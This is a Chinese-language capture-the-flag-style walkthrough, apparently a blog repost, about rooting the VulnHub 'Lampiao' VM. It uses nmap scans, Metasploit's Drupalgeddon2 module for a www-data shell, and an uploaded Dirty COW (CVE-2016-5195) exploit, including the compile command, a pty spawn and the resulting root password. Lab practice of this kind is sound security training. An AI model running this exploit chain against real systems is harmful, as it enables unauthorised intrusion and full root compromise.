Linux脏牛漏洞提权
通過vulnhub平臺搭建靶場
靶機地址:Vulnerable By Design - Search: lampiao ~ VulnHub
靶機下載地址:https://download.vulnhub.com/lampiao/Lampiao.zip
下載完成后,雙擊Lampiao.ovf運行
啟動靶機后,默認是不給用戶名、密碼和IP地址的
通過查看kali自身的IP地址,如下圖,確定當前靶機也在192.168.200下,使用nmap進行C段掃描
nmap掃描192.168.200.0/24
首先我們使用nmap的sP參數通過ping探測已存活的主機
nmap -sP 192.168.200.0/24掃描192.168.200.152的端口
nmap -p1-65535 192.168.200.152訪問192.168.200.152:1898
啟動msf,通過msf搜索所有關于Drupal的漏洞
使用exploit/unix/webapp/drupal_drupalgeddon2
show options查看所需參數
設置目標地址和目標端口
set rhost 192.168.200.152
set rport 1898
exploit進行攻擊,并返回meterpreter會話
查看當前用戶為www-data
上傳漏洞收集腳本到目標主機賦予執行權限并執行
下載地址:GitHub - mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool
upload /home/kali/桌面/linux-exploit-suggester.sh /tmp/1.sh進入目標主機的/tmp目錄,查看上傳的1.sh是否存在
賦予1.sh執行權限
chmod +x 1.sh運行1.sh,發現該靶機存在臟牛漏洞?
上傳漏洞收集腳本到目標主機賦予執行權限并執行
exp下載地址:https://codeload.github.com/gbonacini/CVE-2016-5195/zip/refs/heads/master
退出shell交互模式,返回meterpreter會話,將腳本上傳至目標地址
upload /home/kali/桌面/dcow.cpp /tmp/dcow.cpp進入shell交互,編譯exp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil開啟py終端,運行./dcow,獲取密碼
python -c 'import pty; pty.spawn("/bin/bash")'登錄root用戶,查看當前權限
用戶名:root
密碼:dirtyCowFun
總結
以上是生活随笔為你收集整理的Linux脏牛漏洞提权的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【活动推荐】2020中国DevOps社区
- 下一篇: SYSLINUX 中文简介(怎样使用)